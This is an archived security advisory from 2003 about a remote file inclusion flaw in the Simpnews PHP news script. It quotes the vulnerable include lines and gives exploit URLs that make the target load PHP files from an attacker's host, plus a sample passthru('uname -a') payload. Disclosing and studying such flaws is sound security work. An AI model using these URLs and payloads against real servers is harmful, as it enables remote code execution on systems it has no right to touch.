what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PUPET-simpnews.txt

PUPET-simpnews.txt
Posted Jul 18, 2003
Authored by PUPET

Simpnews has an include file vulnerability that allows a remote attacker to load malicious PHP scripts.

tags | exploit, remote, php
SHA-256 | 3a1cb29b2d9407d519d17fe3a494ffe6d482069586256ca3aea9634a0659e949
Download | Favorite | View

PUPET-simpnews.txt

Change Mirror Download
original File name : PUPET-simpnews.txt
date releases      : july 15, 2003

Informations :
=========================
Advisory Name: Simpnews include file Vulnerability
Author: PUPET <pupet@cosmo.com>
Discover by: PUPET <pupet@cosmo.com>
Website vendor : http://www.boesch-it.de/
Versions : tested on V2.01  -> V2.13 
Problem : Include file


PHP Code/Location :
=========================

/eventscroller.php :
---------------------------
...
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
if(!isset($category))
  $category=0;
if(!isset($lang) || !$lang)

...
--------------------------


/eventcal2.php :
---------------------------
...
if(!isset($lastvisitdate))
  $lastvisitdate=0;
require_once($path_simpnews.'/config.php');
require_once($path_simpnews.'/functions.php');
include_once($path_simpnews.'/includes/has_entries.inc');
...
---------------------------

Exploits :
===============
http://[target]/eventcal2.php.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php
http://[attacker]/includes/has_entries.inc
or 
http://[target]/eventscroller.php?path_simpnews=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.php

Example for config.php on http://[attacker]/
==================
<? passthru("uname -a"); ?> 

Vendor Response:
==============
Not contacted yet

Patch :
=============
will post soon at http://www.cracxer.or.id .

reference :
=============
http://www.pupet.net/cracxerfiles

==============

This bugs Discover by : PUPET members of cracxer.or.id sub-devision security focus (www.cracxer.or.id)

Thanks to :
============
kaka-joe , pak-tani, Bewok , AxAL , ^BuBuR^aYaM^ , Ernesto_che_guevarra , Babah, Idon 
Schatje , juventini , Headup , Quervo , kecap , notts , Kemo (candyman) and all crew #cracxer, #dhegleng, #minangcrew, #indocracker at @dalnet

By :
============
PUPET (no more mr nice guy)


_____________________________________________________________
Get email for your site ---> http://mail.cosmo.com
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close